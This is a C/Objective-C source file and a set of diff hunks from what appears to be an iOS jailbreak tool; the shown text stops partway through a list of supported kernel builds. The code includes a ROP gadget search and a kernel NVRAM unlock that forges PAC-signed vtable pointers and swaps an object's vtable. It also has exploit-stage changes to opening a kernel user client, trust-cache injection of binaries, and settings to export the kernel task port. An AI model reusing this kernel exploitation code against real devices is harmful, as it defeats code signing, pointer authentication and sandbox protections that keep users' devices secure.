||||
#include "prefs.h"
|
||||
#include <Foundation/Foundation.h>
|
||||
#include <common.h>
|
||||
#include "utils.h"
|
||||
|
||||
@interface NSUserDefaults ()
|
||||
- (id)objectForKey:(id)arg1 inDomain:(id)arg2;
|
||||
- (void)setObject:(id)arg1 forKey:(id)arg2 inDomain:(id)arg3;
|
||||
@end
|
||||
|
||||
static NSUserDefaults *userDefaults = nil;
|
||||
static NSString *prefsFile = nil;
|
||||
|
||||
prefs_t *new_prefs() {
|
||||
prefs_t *prefs = (prefs_t *)malloc(sizeof(prefs_t));
|
||||
assert(prefs != NULL);
|
||||
bzero(prefs, sizeof(prefs_t));
|
||||
return prefs;
|
||||
}
|
||||
|
||||
prefs_t *copy_prefs() {
|
||||
prefs_t *prefs = new_prefs();
|
||||
load_prefs(prefs);
|
||||
return prefs;
|
||||
}
|
||||
|
||||
void release_prefs(prefs_t **prefs) {
|
||||
SafeFreeNULL(*prefs);
|
||||
}
|
||||
|
||||
bool load_prefs(prefs_t *prefs) {
|
||||
if (prefs == NULL) {
|
||||
return false;
|
||||
}
|
||||
prefs->load_tweaks = (bool)[[userDefaults objectForKey:@K_TWEAK_INJECTION inDomain:prefsFile] boolValue];
|
||||
prefs->load_daemons = (bool)[[userDefaults objectForKey:@K_LOAD_DAEMONS inDomain:prefsFile] boolValue];
|
||||
prefs->dump_apticket = (bool)[[userDefaults objectForKey:@K_DUMP_APTICKET inDomain:prefsFile] boolValue];
|
||||
prefs->run_uicache = (bool)[[userDefaults objectForKey:@K_REFRESH_ICON_CACHE inDomain:prefsFile] boolValue];
|
||||
prefs->boot_nonce = (const char *)[[userDefaults objectForKey:@K_BOOT_NONCE inDomain:prefsFile] UTF8String];
|
||||
prefs->disable_auto_updates = (bool)[[userDefaults objectForKey:@K_DISABLE_AUTO_UPDATES inDomain:prefsFile] boolValue];
|
||||
prefs->disable_app_revokes = (bool)[[userDefaults objectForKey:@K_DISABLE_APP_REVOKES inDomain:prefsFile] boolValue];
|
||||
prefs->overwrite_boot_nonce = (bool)[[userDefaults objectForKey:@K_OVERWRITE_BOOT_NONCE inDomain:prefsFile] boolValue];
|
||||
prefs->export_kernel_task_port = (bool)[[userDefaults objectForKey:@K_EXPORT_KERNEL_TASK_PORT inDomain:prefsFile] boolValue];
|
||||
prefs->restore_rootfs = (bool)[[userDefaults objectForKey:@K_RESTORE_ROOTFS inDomain:prefsFile] boolValue];
|
||||
prefs->increase_memory_limit = (bool)[[userDefaults objectForKey:@K_INCREASE_MEMORY_LIMIT inDomain:prefsFile] boolValue];
|
||||
prefs->ecid = (const char *)[[userDefaults objectForKey:@K_ECID inDomain:prefsFile] UTF8String];
|
||||
prefs->install_cydia = (bool)[[userDefaults objectForKey:@K_INSTALL_CYDIA inDomain:prefsFile] boolValue];
|
||||
prefs->install_openssh = (bool)[[userDefaults objectForKey:@K_INSTALL_OPENSSH inDomain:prefsFile] boolValue];
|
||||
prefs->reload_system_daemons = (bool)[[userDefaults objectForKey:@K_RELOAD_SYSTEM_DAEMONS inDomain:prefsFile] boolValue];
|
||||
prefs->reset_cydia_cache = (bool)[[userDefaults objectForKey:@K_RESET_CYDIA_CACHE inDomain:prefsFile] boolValue];
|
||||
prefs->ssh_only = (bool)[[userDefaults objectForKey:@K_SSH_ONLY inDomain:prefsFile] boolValue];
|
||||
prefs->enable_get_task_allow = (bool)[[userDefaults objectForKey:@K_ENABLE_GET_TASK_ALLOW inDomain:prefsFile]boolValue];
|
||||
prefs->set_cs_debugged = (bool)[[userDefaults objectForKey:@K_SET_CS_DEBUGGED inDomain:prefsFile] boolValue];
|
||||
prefs->exploit = (int)[[userDefaults objectForKey:@K_EXPLOIT inDomain:prefsFile] intValue];
|
||||
prefs->hide_log_window = (bool)[[userDefaults objectForKey:@K_HIDE_LOG_WINDOW inDomain:prefsFile] boolValue];
|
||||
return true;
|
||||
}
|
||||
|
||||
bool set_prefs(prefs_t *prefs) {
|
||||
if (prefs == NULL) {
|
||||
return false;
|
||||
}
|
||||
[userDefaults setObject:[NSNumber numberWithBool:(BOOL)prefs->load_tweaks] forKey:@K_TWEAK_INJECTION inDomain:prefsFile];
|
||||
[userDefaults setObject:[NSNumber numberWithBool:(BOOL)prefs->load_daemons] forKey:@K_LOAD_DAEMONS inDomain:prefsFile];
|
||||
[userDefaults setObject:[NSNumber numberWithBool:(BOOL)prefs->dump_apticket] forKey:@K_DUMP_APTICKET inDomain:prefsFile];
|
||||
[userDefaults setObject:[NSNumber numberWithBool:(BOOL)prefs->run_uicache] forKey:@K_REFRESH_ICON_CACHE inDomain:prefsFile];
|
||||
[userDefaults setObject:[NSString stringWithUTF8String:(const char *)prefs->boot_nonce] forKey:@K_BOOT_NONCE inDomain:prefsFile];
|
||||
[userDefaults setObject:[NSNumber numberWithBool:(BOOL)prefs->disable_auto_updates] forKey:@K_DISABLE_AUTO_UPDATES inDomain:prefsFile];
|
||||
[userDefaults setObject:[NSNumber numberWithBool:(BOOL)prefs->disable_app_revokes] forKey:@K_DISABLE_APP_REVOKES inDomain:prefsFile];
|
||||
[userDefaults setObject:[NSNumber numberWithBool:(BOOL)prefs->overwrite_boot_nonce] forKey:@K_OVERWRITE_BOOT_NONCE inDomain:prefsFile];
|
||||
[userDefaults setObject:[NSNumber numberWithBool:(BOOL)prefs->export_kernel_task_port] forKey:@K_EXPORT_KERNEL_TASK_PORT inDomain:prefsFile];
|
||||
[userDefaults setObject:[NSNumber numberWithBool:(BOOL)prefs->restore_rootfs] forKey:@K_RESTORE_ROOTFS inDomain:prefsFile];
|
||||
[userDefaults setObject:[NSNumber numberWithBool:(BOOL)prefs->increase_memory_limit] forKey:@K_INCREASE_MEMORY_LIMIT inDomain:prefsFile];
|
||||
[userDefaults setObject:[NSString stringWithUTF8String:(const char *)prefs->ecid] forKey:@K_ECID inDomain:prefsFile];
|
||||
[userDefaults setObject:[NSNumber numberWithBool:(BOOL)prefs->install_cydia] forKey:@K_INSTALL_CYDIA inDomain:prefsFile];
|
||||
[userDefaults setObject:[NSNumber numberWithBool:(BOOL)prefs->install_openssh] forKey:@K_INSTALL_OPENSSH inDomain:prefsFile];
|
||||
[userDefaults setObject:[NSNumber numberWithBool:(BOOL)prefs->reload_system_daemons] forKey:@K_RELOAD_SYSTEM_DAEMONS inDomain:prefsFile];
|
||||
[userDefaults setObject:[NSNumber numberWithBool:(BOOL)prefs->reset_cydia_cache] forKey:@K_RESET_CYDIA_CACHE inDomain:prefsFile];
|
||||
[userDefaults setObject:[NSNumber numberWithBool:(BOOL)prefs->ssh_only] forKey:@K_SSH_ONLY inDomain:prefsFile];
|
||||
[userDefaults setObject:[NSNumber numberWithBool:(BOOL)prefs->enable_get_task_allow] forKey:@K_ENABLE_GET_TASK_ALLOW inDomain:prefsFile];
|
||||
[userDefaults setObject:[NSNumber numberWithBool:(BOOL)prefs->set_cs_debugged] forKey:@K_SET_CS_DEBUGGED inDomain:prefsFile];
|
||||
[userDefaults setObject:[NSNumber numberWithInt:(int)prefs->exploit] forKey:@K_EXPLOIT inDomain:prefsFile];
|
||||
[userDefaults setObject:[NSNumber numberWithBool:(BOOL)prefs->hide_log_window] forKey:@K_HIDE_LOG_WINDOW inDomain:prefsFile];
|
||||
[userDefaults synchronize];
|
||||
return true;
|
||||
}
|
||||
|
||||
void register_default_prefs() {
|
||||
NSMutableDictionary *defaults = [NSMutableDictionary new];
|
||||
defaults[@K_TWEAK_INJECTION] = @YES;
|
||||
defaults[@K_LOAD_DAEMONS] = @YES;
|
||||
defaults[@K_DUMP_APTICKET] = @YES;
|
||||
defaults[@K_REFRESH_ICON_CACHE] = @NO;
|
||||
defaults[@K_BOOT_NONCE] = @"0x1111111111111111";
|
||||
defaults[@K_DISABLE_AUTO_UPDATES] = @YES;
|
||||
defaults[@K_DISABLE_APP_REVOKES] = @YES;
|
||||
defaults[@K_OVERWRITE_BOOT_NONCE] = @YES;
|
||||
defaults[@K_EXPORT_KERNEL_TASK_PORT] = @NO;
|
||||
defaults[@K_RESTORE_ROOTFS] = @NO;
|
||||
defaults[@K_INCREASE_MEMORY_LIMIT] = @NO;
|
||||
defaults[@K_ECID] = @"0x0";
|
||||
defaults[@K_INSTALL_CYDIA] = @NO;
|
||||
defaults[@K_INSTALL_OPENSSH] = @NO;
|
||||
defaults[@K_RELOAD_SYSTEM_DAEMONS] = @YES;
|
||||
defaults[@K_SSH_ONLY] = @NO;
|
||||
defaults[@K_ENABLE_GET_TASK_ALLOW] = @NO;
|
||||
defaults[@K_SET_CS_DEBUGGED] = @NO;
|
||||
defaults[@K_HIDE_LOG_WINDOW] = @NO;
|
||||
defaults[@K_EXPLOIT] = [NSNumber numberWithInteger:recommendedJailbreakSupport()];
|
||||
[userDefaults registerDefaults:defaults];
|
||||
}
|
||||
|
||||
void repair_prefs() {
|
||||
prefs_t *prefs = copy_prefs();
|
||||
if (!supportsExploit(prefs->exploit)) prefs->exploit = (int)recommendedJailbreakSupport();
|
||||
set_prefs(prefs);
|
||||
release_prefs(&prefs);
|
||||
}
|
||||
|
||||
void reset_prefs() {
|
||||
[userDefaults removePersistentDomainForName:[[NSBundle mainBundle] bundleIdentifier]];
|
||||
}
|
||||
__attribute__((constructor))
|
||||
static void ctor() {
|
||||
userDefaults = [NSUserDefaults standardUserDefaults];
|
||||
prefsFile = [NSString stringWithFormat:@"%@/Library/Preferences/%@.plist", NSHomeDirectory(), [[NSBundle mainBundle] bundleIdentifier]];
|
||||
}
|
||||
@@ -10,14 +10,40 @@
|
||||
#include <mach/mach_traps.h>
|
||||
#include <mach/task.h>
|
||||
|
||||
extern uint64_t
|
||||
find_blr_x19_gadget(void);
|
||||
|
||||
#include "remote_call.h"
|
||||
#include "remote_memory.h"
|
||||
|
||||
#include <common.h>
|
||||
|
||||
#if !__arm64e__
|
||||
static uint64_t find_gadget_candidate(char **alternatives, size_t gadget_length) {
|
||||
auto const haystack_start = (void *)atoi; // will do...
|
||||
auto haystack_size = 100*1024*1024; // likewise...
|
||||
|
||||
for (char *candidate = *alternatives; candidate != NULL; alternatives++) {
|
||||
void *found_at = memmem(haystack_start, haystack_size, candidate, gadget_length);
|
||||
if (found_at != NULL){
|
||||
LOG("found at: %llx", (uint64_t)found_at);
|
||||
return (uint64_t)found_at;
|
||||
}
|
||||
}
|
||||
return 0;
|
||||
}
|
||||
|
||||
static uint64_t blr_x19_addr = 0;
|
||||
static uint64_t find_blr_x19_gadget()
|
||||
{
|
||||
if (blr_x19_addr != 0){
|
||||
return blr_x19_addr;
|
||||
}
|
||||
auto const blr_x19 = "\x60\x02\x3f\xd6";
|
||||
char* candidates[] = {blr_x19, NULL};
|
||||
blr_x19_addr = find_gadget_candidate(candidates, 4);
|
||||
return blr_x19_addr;
|
||||
}
|
||||
|
||||
#endif
|
||||
|
||||
// no support for non-register args
|
||||
#define MAX_REMOTE_ARGS 8
|
||||
|
||||
|
||||
@@ -11,9 +11,12 @@
|
||||
#include <iokit.h>
|
||||
#include <common.h>
|
||||
#include "KernelUtilities.h"
|
||||
#include "KernelStructureOffsets.h"
|
||||
#include "KernelOffsets.h"
|
||||
#include "KernelMemory.h"
|
||||
#include "find_port.h"
|
||||
#include "pac.h"
|
||||
#include "kernel_call.h"
|
||||
#include "kc_parameters.h"
|
||||
|
||||
static const size_t max_vtable_size = 0x1000;
|
||||
static const size_t kernel_buffer_size = 0x4000;
|
||||
@@ -49,6 +52,7 @@ uint64_t get_iodtnvram_obj(void) {
|
||||
|
||||
uint64_t orig_vtable = 0;
|
||||
uint64_t fake_vtable = 0;
|
||||
uint64_t fake_vtable_xpac = 0;
|
||||
|
||||
int unlocknvram(void) {
|
||||
uint64_t obj = get_iodtnvram_obj();
|
||||
@@ -58,28 +62,52 @@ int unlocknvram(void) {
|
||||
}
|
||||
|
||||
orig_vtable = ReadKernel64(obj);
|
||||
uint64_t vtable_xpac = kernel_xpacd(orig_vtable);
|
||||
|
||||
uint64_t *buf = calloc(1, max_vtable_size);
|
||||
kread(orig_vtable, buf, max_vtable_size);
|
||||
kread(vtable_xpac, buf, max_vtable_size);
|
||||
|
||||
// alter it
|
||||
buf[getOFVariablePerm / sizeof(uint64_t)] = \
|
||||
buf[searchNVRAMProperty / sizeof(uint64_t)];
|
||||
kernel_xpaci(buf[searchNVRAMProperty / sizeof(uint64_t)]);
|
||||
|
||||
// allocate buffer in kernel and copy it back
|
||||
fake_vtable = kmem_alloc_wired(kernel_buffer_size);
|
||||
wkbuffer(fake_vtable, buf, kernel_buffer_size);
|
||||
// allocate buffer in kernel
|
||||
fake_vtable_xpac = kmem_alloc_wired(kernel_buffer_size);
|
||||
|
||||
// Forge the pacia pointers to the virtual methods.
|
||||
size_t count = 0;
|
||||
for (; count < max_vtable_size / sizeof(*buf); count++) {
|
||||
uint64_t vmethod = buf[count];
|
||||
if (vmethod == 0) {
|
||||
break;
|
||||
}
|
||||
#if __arm64e__
|
||||
assert(count < VTABLE_PAC_CODES(IODTNVRAM).count);
|
||||
vmethod = kernel_xpaci(vmethod);
|
||||
uint64_t vmethod_address = fake_vtable_xpac + count * sizeof(*buf);
|
||||
buf[count] = kernel_forge_pacia_with_type(vmethod, vmethod_address,
|
||||
VTABLE_PAC_CODES(IODTNVRAM).codes[count]);
|
||||
#endif // __arm64e__
|
||||
}
|
||||
|
||||
// and copy it back
|
||||
kwrite(fake_vtable_xpac, buf, count*sizeof(*buf));
|
||||
#if __arm64e__
|
||||
fake_vtable = kernel_forge_pacda(fake_vtable_xpac, 0);
|
||||
#else
|
||||
fake_vtable = fake_vtable_xpac;
|
||||
#endif
|
||||
|
||||
// replace vtable on IODTNVRAM object
|
||||
WriteKernel64(obj, fake_vtable);
|
||||
|
||||
free(buf);
|
||||
SafeFreeNULL(buf);
|
||||
LOG("Unlocked nvram");
|
||||
return 0;
|
||||
}
|
||||
|
||||
int locknvram(void) {
|
||||
if (orig_vtable == 0 || fake_vtable == 0) {
|
||||
if (orig_vtable == 0 || fake_vtable_xpac == 0) {
|
||||
LOG("Trying to lock nvram, but didnt unlock first");
|
||||
return -1;
|
||||
}
|
||||
@@ -91,7 +119,7 @@ int locknvram(void) {
|
||||
}
|
||||
|
||||
WriteKernel64(obj, orig_vtable);
|
||||
kmem_free(fake_vtable, kernel_buffer_size);
|
||||
kmem_free(fake_vtable_xpac, kernel_buffer_size);
|
||||
|
||||
LOG("Locked nvram");
|
||||
return 0;
|
||||
|
||||
@@ -15,6 +15,7 @@
|
||||
#include "log.h"
|
||||
#include "mach_vm.h"
|
||||
#include "parameters.h"
|
||||
#include "common.h"
|
||||
|
||||
// ---- Global variables --------------------------------------------------------------------------
|
||||
|
||||
@@ -71,10 +72,6 @@ stage0_create_user_client() {
|
||||
ERROR("could not find services matching %s", "IOAudio2Device");
|
||||
goto fail_0;
|
||||
}
|
||||
// Assume the kernel's credentials in order to look up the user client. Otherwise we'd be
|
||||
// denied with a sandbox error.
|
||||
uint64_t ucred_field, ucred;
|
||||
assume_kernel_credentials(&ucred_field, &ucred);
|
||||
// Now try to open each service in turn.
|
||||
for (;;) {
|
||||
// Get the service.
|
||||
@@ -97,8 +94,6 @@ stage0_create_user_client() {
|
||||
DEBUG_TRACE(2, "%s returned 0x%x: %s", "IOServiceOpen", kr, mach_error_string(kr));
|
||||
DEBUG_TRACE(2, "could not open %s", "IOAudio2DeviceUserClient");
|
||||
}
|
||||
// Restore the credentials.
|
||||
restore_credentials(ucred_field, ucred);
|
||||
fail_1:
|
||||
IOObjectRelease(iter);
|
||||
fail_0:
|
||||
@@ -327,7 +322,7 @@ stage3_kernel_call_init() {
|
||||
uint64_t *vtable = stage2_copyout_user_client_vtable();
|
||||
size_t count = stage2_patch_user_client_vtable(vtable);
|
||||
stage2_patch_user_client(vtable, count);
|
||||
free(vtable);
|
||||
SafeFreeNULL(vtable);
|
||||
return true;
|
||||
}
|
||||
|
||||
|
||||
@@ -14,6 +14,8 @@
|
||||
|
||||
#define system(x) _system(x)
|
||||
extern int logfd;
|
||||
extern bool injectedToTrustCache;
|
||||
extern NSMutableArray *toInjectToTrustCache;
|
||||
|
||||
#define DEFAULT_VERSION_STRING "Hacked"
|
||||
#define SLIDE_FILE "/var/tmp/slide.txt"
|
||||
@@ -24,8 +26,10 @@ typedef enum {
|
||||
async_wake_exploit,
|
||||
voucher_swap_exploit,
|
||||
mach_swap_exploit,
|
||||
mach_swap_2_exploit,
|
||||
deja_xnu_exploit,
|
||||
necp_exploit
|
||||
necp_exploit,
|
||||
kalloc_crash
|
||||
} exploit_t;
|
||||
|
||||
enum hashtype {
|
||||
@@ -34,6 +38,16 @@ enum hashtype {
|
||||
};
|
||||
int proc_pidpath(pid_t pid, void *buffer, uint32_t buffersize);
|
||||
|
||||
@interface LSApplicationWorkspace : NSObject
|
||||
+ (id) defaultWorkspace;
|
||||
- (BOOL) registerApplication:(id)application;
|
||||
- (BOOL) unregisterApplication:(id)application;
|
||||
- (BOOL) invalidateIconCache:(id)bundle;
|
||||
- (BOOL) registerApplicationDictionary:(id)application;
|
||||
- (BOOL) installApplication:(id)application withOptions:(id)options;
|
||||
- (BOOL) _LSPrivateRebuildApplicationDatabasesForSystemApps:(BOOL)system internal:(BOOL)internal user:(BOOL)user;
|
||||
@end
|
||||
|
||||
static inline bool create_file_data(const char *file, int owner, mode_t mode, NSData *data) {
|
||||
return [[NSFileManager defaultManager] createFileAtPath:@(file) contents:data attributes:@{
|
||||
NSFileOwnerAccountID: @(owner),
|
||||
@@ -100,10 +114,14 @@ int runCommandv(const char *cmd, int argc, const char * const* argv, void (^unre
|
||||
int runCommand(const char *cmd, ...);
|
||||
NSString *pathForResource(NSString *resource);
|
||||
pid_t pidOfProcess(const char *name);
|
||||
char *getKernelVersion(void);
|
||||
char *getMachineName(void);
|
||||
char *getModelName(void);
|
||||
bool kernelVersionContains(const char *string);
|
||||
bool machineNameContains(const char *string);
|
||||
bool multi_path_tcp_enabled(void);
|
||||
bool jailbreakEnabled(void);
|
||||
NSString *getKernelBuildVersion(void);
|
||||
bool supportsExploit(exploit_t exploit);
|
||||
bool jailbreakSupported(void);
|
||||
bool respringSupported(void);
|
||||
@@ -127,6 +145,23 @@ bool uninstallRootLessJB(void);
|
||||
bool verifyECID(NSString *ecid);
|
||||
bool canOpen(const char *URL);
|
||||
bool airplaneModeEnabled(void);
|
||||
bool installApp(const char *bundle);
|
||||
bool rebuildApplicationDatabases(void);
|
||||
char *get_path_for_pid(pid_t pid);
|
||||
NSString *getECID(void);
|
||||
NSString *getUDID(void);
|
||||
char *sysctlWithName(const char *name);
|
||||
char *getOSVersion(void);
|
||||
char *getOSProductVersion(void);
|
||||
void printOSDetails(void);
|
||||
bool isBetaFirmware(void);
|
||||
double getUptime(void);
|
||||
vm_size_t get_kernel_page_size(void);
|
||||
int waitForFile(const char *filename);
|
||||
NSString *hexFromInt(NSInteger val);
|
||||
void waitFor(int seconds);
|
||||
void blockDomainWithName(const char *name);
|
||||
void unblockDomainWithName(const char *name);
|
||||
|
||||
extern NSData *lastSystemOutput;
|
||||
|
||||
|
||||
+366
-346
@@ -10,7 +10,6 @@
|
||||
#import <sys/sysctl.h>
|
||||
#import <Foundation/Foundation.h>
|
||||
#import <CommonCrypto/CommonDigest.h>
|
||||
#import <magic.h>
|
||||
#import <spawn.h>
|
||||
#include <copyfile.h>
|
||||
#include <common.h>
|
||||
@@ -29,30 +28,29 @@
|
||||
extern char **environ;
|
||||
int logfd=-1;
|
||||
|
||||
bool injectedToTrustCache = false;
|
||||
NSMutableArray *toInjectToTrustCache = nil;
|
||||
|
||||
NSData *lastSystemOutput=nil;
|
||||
void injectDir(NSString *dir) {
|
||||
NSFileManager *fm = [NSFileManager defaultManager];
|
||||
NSMutableArray *toInject = [NSMutableArray new];
|
||||
magic_t cookie = magic_open(MAGIC_MIME_TYPE);
|
||||
NSString *magicFile = pathForResource(@"macho.mgc");
|
||||
if (cookie && magic_load(cookie, magicFile.UTF8String)==0) {
|
||||
const char *magic=NULL;
|
||||
for (NSString *filename in [fm contentsOfDirectoryAtPath:dir error:nil]) {
|
||||
NSString *file = [dir stringByAppendingPathComponent:filename];
|
||||
if ((magic = magic_file(cookie, file.UTF8String)))
|
||||
{
|
||||
if (strcmp(magic, "application/x-mach-binary")==0) {
|
||||
[toInject addObject:file];
|
||||
}
|
||||
for (NSString *filename in [fm contentsOfDirectoryAtPath:dir error:nil]) {
|
||||
NSString *file = [dir stringByAppendingPathComponent:filename];
|
||||
if (cdhashFor(file) != nil) {
|
||||
[toInject addObject:file];
|
||||
}
|
||||
}
|
||||
LOG("Will inject %lu files for %@", (unsigned long)toInject.count, dir);
|
||||
if (toInject.count > 0) {
|
||||
if (injectedToTrustCache) {
|
||||
LOG("Warning: Trust cache already injected");
|
||||
}
|
||||
for (NSString *path in toInject) {
|
||||
if (![toInjectToTrustCache containsObject:path]) {
|
||||
[toInjectToTrustCache addObject:path];
|
||||
}
|
||||
}
|
||||
} else {
|
||||
LOG("Error opening or loading magic");
|
||||
}
|
||||
magic_close(cookie);
|
||||
LOG("Injecting %lu files for %@", (unsigned long)toInject.count, dir);
|
||||
if (toInject.count > 0) {
|
||||
injectTrustCache(toInject, GETOFFSET(trustcache));
|
||||
}
|
||||
}
|
||||
|
||||
@@ -262,36 +260,26 @@ bool extractDeb(NSString *debPath) {
|
||||
[deb extractFileNum:3 toFd:pipe.fileHandleForWriting.fileDescriptor];
|
||||
});
|
||||
bool result = [tar extractToPath:@"/"];
|
||||
if ((kCFCoreFoundationVersionNumber >= 1535.12) && result) {
|
||||
if ((kCFCoreFoundationVersionNumber >= kCFCoreFoundationVersionNumber_iOS_12_0) && result) {
|
||||
chdir("/");
|
||||
NSMutableArray *toInject = [NSMutableArray new];
|
||||
NSDictionary *files = tar.files;
|
||||
magic_t cookie = magic_open(MAGIC_MIME_TYPE);
|
||||
LOG("Opened magic");
|
||||
NSString *magicFile = pathForResource(@"macho.mgc");
|
||||
LOG("MagicFile: %@", magicFile);
|
||||
if (cookie && magic_load(cookie, magicFile.UTF8String)==0) {
|
||||
LOG("Opened magic");
|
||||
const char *magic=NULL;
|
||||
for (NSString *file in files.allKeys) {
|
||||
mode_t mode = [files[file][@"mode"] integerValue];
|
||||
if (!S_ISDIR(mode)) {
|
||||
if ((magic = magic_file(cookie, file.UTF8String)))
|
||||
{
|
||||
LOG("%@: %s", file, magic);
|
||||
if (strcmp(magic, "application/x-mach-binary")==0) {
|
||||
[toInject addObject:file];
|
||||
}
|
||||
}
|
||||
for (NSString *file in files.allKeys) {
|
||||
NSString *path = [@"/" stringByAppendingString:[file stringByStandardizingPath]];
|
||||
if (cdhashFor(path) != nil) {
|
||||
[toInject addObject:path];
|
||||
}
|
||||
}
|
||||
LOG("Will inject %lu files for %@", (unsigned long)toInject.count, debPath);
|
||||
if (toInject.count > 0) {
|
||||
if (injectedToTrustCache) {
|
||||
LOG("Warning: Trust cache already injected");
|
||||
}
|
||||
for (NSString *path in toInject) {
|
||||
if (![toInjectToTrustCache containsObject:path]) {
|
||||
[toInjectToTrustCache addObject:path];
|
||||
}
|
||||
}
|
||||
} else {
|
||||
LOG("Error opening or loading magic");
|
||||
}
|
||||
magic_close(cookie);
|
||||
LOG("Injecting %lu files for %@", (unsigned long)toInject.count, debPath);
|
||||
if (toInject.count > 0) {
|
||||
injectTrustCache(toInject, GETOFFSET(trustcache));
|
||||
}
|
||||
}
|
||||
return result;
|
||||
@@ -420,7 +408,7 @@ bool is_mountpoint(const char *filename) {
|
||||
assert(rv == ERR_SUCCESS);
|
||||
if (cwd) {
|
||||
chdir(cwd);
|
||||
free(cwd);
|
||||
SafeFreeNULL(cwd);
|
||||
}
|
||||
return buf.st_dev != p_buf.st_dev || buf.st_ino == p_buf.st_ino;
|
||||
}
|
||||
@@ -639,36 +627,49 @@ pid_t pidOfProcess(const char *name) {
|
||||
pid_t pids[numberOfProcesses];
|
||||
bzero(pids, sizeof(pids));
|
||||
proc_listpids(PROC_ALL_PIDS, 0, pids, (int)sizeof(pids));
|
||||
for (int i = 0; i < numberOfProcesses; ++i) {
|
||||
bool foundProcess = false;
|
||||
pid_t processPid = 0;
|
||||
for (int i = 0; i < numberOfProcesses && !foundProcess; ++i) {
|
||||
if (pids[i] == 0) {
|
||||
continue;
|
||||
}
|
||||
char pathBuffer[PROC_PIDPATHINFO_MAXSIZE];
|
||||
bzero(pathBuffer, PROC_PIDPATHINFO_MAXSIZE);
|
||||
proc_pidpath(pids[i], pathBuffer, sizeof(pathBuffer));
|
||||
if (strlen(pathBuffer) > 0 && strcmp(pathBuffer, name) == 0) {
|
||||
return pids[i];
|
||||
char *path = get_path_for_pid(pids[i]);
|
||||
if (path != NULL) {
|
||||
if (strlen(path) > 0 && strcmp(path, name) == 0) {
|
||||
processPid = pids[i];
|
||||
foundProcess = true;
|
||||
}
|
||||
SafeFreeNULL(path);
|
||||
}
|
||||
}
|
||||
return 0;
|
||||
return processPid;
|
||||
}
|
||||
|
||||
char *getKernelVersion() {
|
||||
return sysctlWithName("kern.version");
|
||||
}
|
||||
|
||||
char *getMachineName() {
|
||||
return sysctlWithName("hw.machine");
|
||||
}
|
||||
char *getModelName() {
|
||||
return sysctlWithName("hw.model");
|
||||
}
|
||||
|
||||
bool kernelVersionContains(const char *string) {
|
||||
static struct utsname u = { 0 };
|
||||
static dispatch_once_t onceToken;
|
||||
dispatch_once(&onceToken, ^{
|
||||
uname(&u);
|
||||
});
|
||||
return (strstr(u.version, string) != NULL);
|
||||
char *kernelVersion = getKernelVersion();
|
||||
if (kernelVersion == NULL) return false;
|
||||
bool ret = strstr(kernelVersion, string) != NULL;
|
||||
SafeFreeNULL(kernelVersion);
|
||||
return ret;
|
||||
}
|
||||
|
||||
bool machineNameContains(const char *string) {
|
||||
static struct utsname u = { 0 };
|
||||
static dispatch_once_t onceToken;
|
||||
dispatch_once(&onceToken, ^{
|
||||
uname(&u);
|
||||
});
|
||||
return (strstr(u.machine, string) != NULL);
|
||||
char *machineName = getMachineName();
|
||||
if (machineName == NULL) return false;
|
||||
bool ret = strstr(machineName, string) != NULL;
|
||||
SafeFreeNULL(machineName);
|
||||
return ret;
|
||||
}
|
||||
|
||||
#define AF_MULTIPATH 39
|
||||
@@ -697,8 +698,8 @@ bool multi_path_tcp_enabled() {
|
||||
eps.sae_dstaddrlen = sizeof(struct sockaddr);
|
||||
connectx(sock, &eps, SAE_ASSOCID_ANY, 0, NULL, 0, NULL, NULL);
|
||||
enabled = (errno != EPERM);
|
||||
free(sockaddr_src);
|
||||
free(sockaddr_dst);
|
||||
SafeFreeNULL(sockaddr_src);
|
||||
SafeFreeNULL(sockaddr_dst);
|
||||
close(sock);
|
||||
});
|
||||
return enabled;
|
||||
@@ -709,326 +710,107 @@ bool jailbreakEnabled() {
|
||||
access(SLIDE_FILE, F_OK) == ERR_SUCCESS;
|
||||
}
|
||||
|
||||
NSString *getKernelBuildVersion() {
|
||||
NSString *kernelBuild = nil;
|
||||
NSString *cleanString = nil;
|
||||
char *kernelVersion = NULL;
|
||||
kernelVersion = getKernelVersion();
|
||||
if (kernelVersion == NULL) return nil;
|
||||
cleanString = [NSString stringWithUTF8String:kernelVersion];
|
||||
SafeFreeNULL(kernelVersion);
|
||||
cleanString = [[cleanString componentsSeparatedByString:@"; "] objectAtIndex:1];
|
||||
cleanString = [[cleanString componentsSeparatedByString:@"-"] objectAtIndex:1];
|
||||
cleanString = [[cleanString componentsSeparatedByString:@"/"] objectAtIndex:0];
|
||||
kernelBuild = [cleanString copy];
|
||||
return kernelBuild;
|
||||
}
|
||||
|
||||
bool supportsExploit(exploit_t exploit) {
|
||||
#ifdef CAN_HAS_UNSUPPORTED_EXPLOIT
|
||||
return true;
|
||||
#else /* !CAN_HAS_UNSUPPORTED_EXPLOIT */
|
||||
static NSArray *list;
|
||||
static dispatch_once_t onceToken;
|
||||
|
||||
dispatch_once(&onceToken, ^{
|
||||
list = @[
|
||||
// Empty List
|
||||
@[@"4397.0.0.2.4~1",
|
||||
@"4481.0.0.2.1~1",
|
||||
@"4532.0.0.0.1~30",
|
||||
@"4556.0.0.2.5~1",
|
||||
@"4570.1.24.2.3~1",
|
||||
@"4570.2.3~8",
|
||||
@"4570.2.5~84",
|
||||
@"4570.2.5~167",
|
||||
@"4570.7.2~3",
|
||||
@"4570.20.55~10",
|
||||
@"4570.20.62~9",
|
||||
@"4570.20.62~4",
|
||||
@"4570.30.79~22",
|
||||
@"4570.30.85~18",
|
||||
@"4570.32.1~2",
|
||||
@"4570.32.1~1",
|
||||
@"4570.40.6~8",
|
||||
@"4570.40.9~7",
|
||||
@"4570.40.9~1",
|
||||
@"4570.50.243~9",
|
||||
@"4570.50.257~6",
|
||||
@"4570.50.279~9",
|
||||
@"4570.50.294~5",
|
||||
@"4570.52.2~3",
|
||||
@"4570.52.2~8",
|
||||
@"4570.60.10.0.1~16",
|
||||
@"4570.60.16~9",
|
||||
@"4570.60.19~25"],
|
||||
|
||||
// Multi Path
|
||||
@[@"4397.0.0.2.4~1",
|
||||
@"4481.0.0.2.1~1",
|
||||
@"4532.0.0.0.1~30",
|
||||
@"4556.0.0.2.5~1",
|
||||
@"4570.1.24.2.3~1",
|
||||
@"4570.2.3~8",
|
||||
@"4570.2.5~84",
|
||||
@"4570.2.5~167",
|
||||
@"4570.7.2~3",
|
||||
@"4570.20.55~10",
|
||||
@"4570.20.62~9",
|
||||
@"4570.20.62~4",
|
||||
@"4570.30.79~22",
|
||||
@"4570.30.85~18",
|
||||
@"4570.32.1~2",
|
||||
@"4570.32.1~1",
|
||||
@"4570.40.6~8",
|
||||
@"4570.40.9~7",
|
||||
@"4570.40.9~1",
|
||||
@"4570.50.243~9",
|
||||
